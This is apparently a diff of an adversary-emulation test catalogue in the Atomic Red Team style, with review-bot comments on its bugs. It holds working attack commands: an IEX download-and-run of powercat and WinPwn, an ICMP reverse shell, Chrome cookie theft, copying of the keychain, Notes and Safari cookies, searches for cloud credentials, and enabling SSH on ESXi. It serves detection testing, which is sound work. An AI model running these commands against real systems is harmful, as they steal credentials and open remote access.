brew install code-cli\nelif [ \"$(expr substr $(uname) 1 5)\" = \"Linux\"
]\nthen mkdir -p $(dirname #{payload_path}) \n PKG_TYPE=$(command
-v apt >/dev/null && echo \"deb\" || echo \"rpm\")\n curl -L \"#{artifact_base_url}?build=#{artifact_build}&os=linux-${PKG_TYPE}-${ARCH_SUFFIX}\"
-o \"#{payload_path}/code.${PKG_TYPE}\"\n (which apt && apt install -y
\"#{payload_path}/code.${PKG_TYPE}\") || (which yum && yum install -y \"#{payload_path}/code.${PKG_TYPE}\")\n
\ rm \"#{payload_path}/code.${PKG_TYPE}\"\nfi\n"
- description: 'Login to VSCode Dev tunnels
'
prereq_command: 'code tunnel user show | grep -q "not logged in" && exit 1
|| exit 0
'
get_prereq_command: 'echo "Login to code tunnel using the following command:
code tunnel user login"
'
executor:
command: 'nohup code tunnel --accept-server-license-terms #{additional_args}
>/dev/null 2>&1 &
'
cleanup_command: |
pkill -9 tunnel
code tunnel unregister
code tunnel user logout
name: sh
T1071.003:
technique:
modified: '2024-04-16T12:28:59.928Z'
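Review bot: the Dev tunnels test lists macos under supported_platforms, but the download_url default is `https://aka.ms/TunnelsCliDownload/linux-x64` and get_prereq_command downloads it unconditionally, so on a Mac the dependency step fetches a Linux binary; either branch on `uname` the way the VSCode test's get_prereq_command does, or drop macos from the platform list. Two smaller points in the same hunk: the VSCode test's description ("binding it to the local service running on the provided port") was copied from the Dev tunnels test, yet this test has no port argument, and its cleanup `pkill -9 tunnel` matches any process whose name contains "tunnel", not only the code tunnel process.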
@@ -78291,6 +78863,33 @@ command-and-control:
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}
name: powershell
- name: Linux ICMP Reverse Shell using icmp-cnc
auto_generated_guid: 8e139e1f-1f3a-4be7-901d-afae9738c064
description: |
ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems.
This method allows attackers to communicate and control compromised devices while remaining undetected.
For more details, check this blog: [ICMP Reverse Shell Blog](https://cryptsus.com/blog/icmp-reverse-shell.html)
**Important Notes:**
- Use `[icmp-cnc]` for the C2 server (Attacker) and `[icmpdoor]` for the C2 client (Victim).
- Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor].
- Root access is required.
supported_platforms:
- linux
executor:
steps: "1. Run the following command on both the attacker and victim machines
to download the required binaries.\n\n mkdir -p /tmp/icmpdoor && wget
-P /tmp/icmpdoor https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmp-cnc
https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmpdoor
&& chmod +x /tmp/icmpdoor/icmp-cnc /tmp/icmpdoor/icmpdoor && echo 'export
PATH=$PATH:/tmp/icmpdoor' >> ~/.bashrc && source ~/.bashrc\n\n2. Start the
C2 server on the attacker system to listen for incoming connections.\n\n
\ icmp-cnc --interface <Network Interface> --destination_ip <VICTIM-IP>\n\n3.
Run the client on the victim machine.\n\n icmpdoor --interface <Network
Interface> --destination_ip <ATTACKER-IP>\n \n4. Cleanup Command: Remove
the icmpdoor directory.\n\n rm -rf /tmp/icmpdoor\n"
name: manual
T1001.003:
technique:
modified: '2024-10-09T15:40:19.436Z'
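Review bot: the cleanup in step 4 only removes /tmp/icmpdoor, but step 1 also appends `export PATH=$PATH:/tmp/icmpdoor` to ~/.bashrc, so every run leaves a persistent, now-dangling PATH entry on both machines; add a step that strips that line from ~/.bashrc, or avoid editing .bashrc altogether and invoke icmp-cnc and icmpdoor by absolute path in steps 2 and 3.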
@@ -80252,9 +80851,12 @@ command-and-control:
{exit 0}
}
get_prereq_command: "Write-Output \"Generating random passwords and saving
to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
-Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\" \n"
to file...\"\n$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object
{ @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
+ @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z')
+ @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?')
| Get-Random }) }\n$passwords | Out-File -FilePath \"#{passwords_file}\"
\ \n"
- description: "Tarz file to embed in image must exist \n"
prereq_command: |
if (!(Test-Path "#{tar_file}")) {exit 1} else {
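Review bot: the new character array contains duplicate entries ('(' and ';' each appear twice), which skews the draw toward those two symbols; the whole literal can be collapsed to `[char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?'`, which is easier to read and removes the duplication. The change itself is right: the old `Get-Random -InputObject '<string>' -Count 12` treats the string as a single object and returns it unchanged rather than producing a 12-character password.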
@@ -81506,7 +82108,7 @@ collection:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /f
cleanup_command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI"
/v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
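Review bot: the cleanup_command unconditionally re-creates DisableAIDataAnalysis with `/d 1`, so on a host where the value did not exist before the test the cleanup leaves a new policy behind instead of restoring the original state; since the command itself now ends with `reg delete`, consider having the cleanup delete the value too, or capture the pre-test value and restore it.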
@@ -83075,11 +83677,11 @@ collection:
container_name:
description: Container name to search for (optional)
type: string
default:
default:
blob_name:
description: Blob name to search for (optional)
type: string
default:
default:
executor:
command: |
try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
@@ -83327,6 +83929,30 @@ collection:
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
cleanup_command: "rm -f $HOME/.art\nrm -f $HOME/gta.db\nrm -f $HOME/sqlite_dump.sh
\n"
- name: Copy Apple Notes database files using AppleScript
auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7
description: 'This command will copy Apple Notes database files using AppleScript
as seen in Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the database files into.
type: path
default: "/private/tmp"
executor:
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to
home folder as text) & "Library:Group Containers:group.com.apple.notes:"'
-e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file
"NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"}
of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile
to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cleanup_command: rm "#{destination_path}/NoteStore.sqlite*"
name: sh
elevation_required: false
T1560.002:
technique:
x_mitre_platforms:
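Review bot: the cleanup_command `rm "#{destination_path}/NoteStore.sqlite*"` places the glob inside double quotes, so sh does not expand it and rm looks for a file literally named NoteStore.sqlite*, leaving all three copied files in place; move the wildcard outside the quotes (`rm "#{destination_path}/NoteStore.sqlite"*`) so NoteStore.sqlite, NoteStore.sqlite-shm and NoteStore.sqlite-wal are all removed.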
@@ -83518,9 +84144,9 @@ collection:
executor:
name: sh
elevation_required: false
command: "which_python=`which python || which python3`\n$which_python -c \"from
zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\"
\n"
command: "which_python=`which python || which python3`\n$which_python -c \"import
tarfile; output_file = tarfile.open('#{path_to_output_file}','w'); output_file.add('#{path_to_input_file}');
output_file.close()\" \n"
cleanup_command: 'rm #{path_to_output_file}
'
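Review bot: switching from ZipFile to tarfile changes the archive format this test produces, but the hunk does not show whether the default for path_to_output_file, or the test's name and description, were updated to match; a default ending in .zip would now contain a tar archive. The explicit `output_file.close()` is an improvement over the old one-liner, which never closed the ZipFile and could leave the archive unflushed.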
@@ -84296,11 +84922,11 @@ collection:
username:
description: office-365 username
type: string
default:
default:
password:
description: office-365 password
type: string
default:
default:
rule_name:
description: email rule name
type: string
@@ -84719,23 +85345,23 @@ collection:
and Application.ReadWrite.All Scope (eg, Global Administrator Role) and
sign-in method is password
type: string
default:
default:
password:
description: Entra user password
type: string
default:
default:
1st_target_mailbox:
description: office-365 target_email_address
type: string
default:
default:
2nd_target_mailbox:
description: office-365 target_email_address
type: string
default:
default:
3rd_target_mailbox:
description: office-365 target_email_address
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft Graph PowerShell SDK must be installed.
@@ -85644,7 +86270,7 @@ lateral-movement:
'
supported_platforms:
- linux
- windows
input_arguments:
vm_host:
description: Specify the host name of the ESXi Server
@@ -85680,6 +86306,52 @@ lateral-movement:
| Where-Object {$_.Key -eq \"TSM-SSH\" } | Stop-VMHostService -Confirm:$false\n"
name: powershell
elevation_required: true
- name: ESXi - Enable SSH via VIM-CMD
auto_generated_guid: 280812c8-4dae-43e9-a74e-1d08ab997c0e
description: |
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
'
cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
'
name: command_prompt
elevation_required: false
T1091:
technique:
modified: '2023-10-17T20:42:21.453Z'
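Review bot: the cleanup_command runs `vim-cmd hostsvc/disable_ssh` unconditionally, so on a host where SSH was already enabled before the test it is switched off afterwards, which can lock operators out of the ESXi host; record the prior state first or at least state this side effect in the description. Two smaller points: `plink -batch` abandons the connection when the host key is not already cached, so the first run against a new host fails under `echo "" |` with no prompt to accept the key, and "creeate" in the description should be "create".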
@@ -86726,7 +87398,7 @@ lateral-movement:
description: Ticket file name usually format of 'id-username\@domain.kirbi'
(e.g. can be dumped by "sekurlsa::tickets /export" module)
type: string
default:
default:
mimikatz_exe:
description: Path of the Mimikatz binary
type: path
@@ -89525,6 +90197,72 @@ credential-access:
cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
name: bash
elevation_required: false
- name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
description: |-
Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
supported_platforms:
- windows
executor:
command: |-
$devToolsPort = 9222
$testUrl = "https://www.google.com"
stop-process -name "chrome" -force -erroraction silentlycontinue
$chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
Start-Sleep 10
$jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
$devToolsPages = ConvertFrom-Json $jsonResponse.Content
$ws_url = $devToolsPages[0].webSocketDebuggerUrl
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$uri = New-Object System.Uri($ws_url)
$ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
$GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
$buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
$segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
$ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
$completeMessage = New-Object System.Text.StringBuilder
do {
$receivedBuffer = New-Object byte[] 2048
$receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
$result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
$receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
$completeMessage.Append($receivedString)
} while (-not $result.EndOfMessage)
$ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
try {
$response = ConvertFrom-Json $completeMessage.ToString()
$cookies = $response.result.cookies
} catch {
Write-Host "Error parsing JSON data."
}
Write-Host $cookies
Stop-Process $chromeProcess -Force
name: powershell
elevation_required: false
- name: Copy Safari BinaryCookies files using AppleScript
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
description: 'This command will copy Safari BinaryCookies files using AppleScript
as seen in Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the BinaryCookies file into.
type: path
default: "/private/tmp"
executor:
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
-e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
destinationFolderPath with replacing' -e 'end tell'
cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
name: sh
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
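Review bot: in the Chrome test, `$completeMessage.Append($receivedString)` returns the StringBuilder, so every loop iteration dumps the accumulated text onto the pipeline; pipe it to Out-Null or cast to [void]. The catch block only writes "Error parsing JSON data." and execution continues to `Write-Host $cookies` with an empty variable and a zero exit code, so a failed retrieval looks the same as success; exit non-zero in the catch. Also, the description says the test "bypasses" app-bound encryption, whereas the command asks an already running browser for its decrypted cookies over the DevTools WebSocket (`Network.getAllCookies`); saying so would keep readers from mistaking it for a decryption bypass.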
@@ -89765,8 +90503,7 @@ credential-access:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
-consoleoutput -noninteractive "
name: powershell
- name: Dumping of SAM, creds, and secrets(Reg Export)
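Review bot: dropping the `$S3cur3Th1sSh1t_repo=...` assignment looks safe as far as this command is concerned, since nothing after it references the variable and WinPwn.ps1 is still loaded from a pinned commit; the same removal is repeated in the later WinPwn hunks, so a single check that the pinned WinPwn.ps1 does not read that variable before defining it covers all of them.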
@@ -89858,7 +90595,7 @@ credential-access:
username:
description: Azure AD username
type: string
default:
default:
password:
description: Azure AD password
type: string
@@ -90207,6 +90944,26 @@ credential-access:
'
name: sh
elevation_required: false
- name: Copy Keychain using cat utility
auto_generated_guid: 5c32102a-c508-49d3-978f-288f8a9f6617
description: 'This command will copy the keychain using the cat utility in a
manner similar to Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
keychain_export:
description: Specify the path to copy they keychain into.
type: path
default: "/tmp/keychain"
executor:
command: 'cat ~/Library/Keychains/login.keychain-db > #{keychain_export}
'
cleanup_command: 'rm #{keychain_export}'
name: sh
elevation_required: false
T1003.004:
technique:
modified: '2024-08-13T15:49:17.591Z'
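Review bot: "copy they keychain into" in the keychain_export description should read "copy the keychain into". Also, keychain_export is typed as a path but `#{keychain_export}` is unquoted in both the command and the cleanup_command, so a destination containing spaces breaks the redirection and the rm; quote it in both.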
@@ -92142,7 +92899,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive
name: powershell
@@ -92153,8 +92909,7 @@ credential-access:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
-consoleoutput -noninteractive "
name: powershell
- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
@@ -92164,8 +92919,7 @@ credential-access:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
-consoleoutput -noninteractive "
name: powershell
T1552:
@@ -92620,9 +93374,10 @@ credential-access:
Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
Remove-Item "#{file_path}\Modified-SysInternalsSuite.zip" -Force
executor:
command: |
Set-Location -path "#{file_path}\Sysinternals";
./accesschk.exe -accepteula .;
command: 'Start-Process "#{file_path}\Sysinternals\accesschk.exe" -ArgumentList
"-accepteula ."
'
cleanup_command: 'Remove-Item "#{file_path}\Sysinternals" -Force -Recurse
-ErrorAction Ignore
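Review bot: the new Start-Process form changes what accesschk examines: the old command did `Set-Location` into the Sysinternals folder before running `./accesschk.exe -accepteula .`, so `.` meant that folder, whereas Start-Process resolves `.` against the caller's current directory. Without -Wait and -NoNewWindow, Start-Process also returns immediately and the output no longer appears in the test's console, and the cleanup's Remove-Item can run while accesschk is still executing; add `-Wait -NoNewWindow -WorkingDirectory "#{file_path}\Sysinternals"` to keep the previous behaviour.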
@@ -93016,7 +93771,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
browserpwn -consoleoutput -noninteractive
cleanup_command: rm .\System.Data.SQLite.dll -ErrorAction Ignore
@@ -93029,7 +93783,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
kittenz -consoleoutput -noninteractive
name: powershell
@@ -94777,7 +95530,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
domainpassspray -consoleoutput -noninteractive -emptypasswords
name: powershell
@@ -95619,7 +96371,7 @@ credential-access:
identifier: T1552.001
atomic_tests:
- name: Find AWS credentials
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
auto_generated_guid: 37807632-d3da-442e-8c2e-00f44928ff8f
description: 'Find local AWS credentials from file, defaults to using / as the
look path.
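Review bot: replacing the auto_generated_guid of an existing test (2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 to 37807632-d3da-442e-8c2e-00f44928ff8f) orphans everything keyed on the old id, such as execution history, detection mappings and the generated docs; if this is a rewrite of the same test, keep the original guid, and if it is meant to be a new test, add it alongside the old one rather than renaming.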
@@ -95633,7 +96385,7 @@ credential-access:
type: string
default: "/"
executor:
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
command: 'find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
'
name: sh
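Review bot: with the default file_path of "/", the new command searches only `//.aws`, whereas the old `-path "*/.aws/*"` form walked the whole tree and found /home/*/.aws/credentials and /Users/*/.aws/credentials; the description still says the test defaults to using / as the look path, which is no longer true in practice. Either keep the recursive form or change the default to the user's home directory.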
@@ -95721,7 +96473,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
name: powershell
@@ -95733,7 +96484,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
name: powershell
@@ -95745,7 +96495,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
name: powershell
@@ -95756,7 +96505,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
cleanup_command: |-
@@ -95775,7 +96523,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
name: powershell
@@ -95787,8 +96534,7 @@ credential-access:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
-consoleoutput -noninteractive "
name: powershell
- name: List Credential Files via PowerShell
@@ -95820,6 +96566,65 @@ credential-access:
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
name: command_prompt
elevation_required: true
- name: Find Azure credentials
auto_generated_guid: a8f6148d-478a-4f43-bc62-5efee9f931a4
description: 'Find local Azure credentials from file, defaults to using / as
the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.azure -name "msal_token_cache.json" -o -name
"accessTokens.json" -type f 2>/dev/null
'
name: sh
- name: Find GCP credentials
auto_generated_guid: aa12eb29-2dbb-414e-8b20-33d34af93543
description: 'Find local Google Cloud Platform credentials from file, defaults
to using / as the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.config/gcloud -name "credentials.db" -o -name
"access_tokens.db" -type f 2>/dev/null
'
name: sh
- name: Find OCI credentials
auto_generated_guid: 9d9c22c9-fa97-4008-a204-478cf68c40af
description: 'Find local Oracle cloud credentials from file, defaults to using
/ as the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
'
name: sh
T1606.001:
technique:
modified: '2023-09-19T21:25:10.511Z'
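Review bot: the Azure and GCP find expressions mix `-o` and `-type f` without grouping: `-name "msal_token_cache.json" -o -name "accessTokens.json" -type f` parses as `-name A -o ( -name B -a -type f )` because the implicit -a binds tighter than -o, so `-type f` only constrains the second name; wrap the two -name tests in `\( ... \)`. All three tests also share the default-path issue of the AWS test above: with file_path "/" they only look in /.azure, /.config/gcloud and /.oci, not in user home directories, while the descriptions say / is the look path.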
@@ -96027,7 +96832,7 @@ credential-access:
username:
description: Azure AD username
type: string
default:
default:
password:
description: Azure AD password
type: string
@@ -96039,7 +96844,7 @@ credential-access:
subscription_id:
description: Azure subscription id to search
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
@@ -98628,7 +99433,7 @@ credential-access:
description: command flags you would like to run (optional and blank by
default)
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'Computer must be domain joined
@@ -98756,7 +99561,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive
name: powershell
@@ -99822,7 +100626,7 @@ discovery:
executor:
name: bash
elevation_required: false
command: 'ping -n 4 #{ping_target}
command: 'ping -c 4 #{ping_target}
'
- name: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
@@ -100122,7 +100926,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPOAudit -noninteractive -consoleoutput
name: powershell
@@ -100134,7 +100937,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPORemoteAccessPolicy -consoleoutput -noninteractive
name: powershell
@@ -100255,7 +101057,7 @@ discovery:
command: |
driverquery /v /fo list
driverquery /si /fo list
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
T1087.002:
@@ -100406,7 +101208,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -100439,7 +101241,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -100471,7 +101273,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
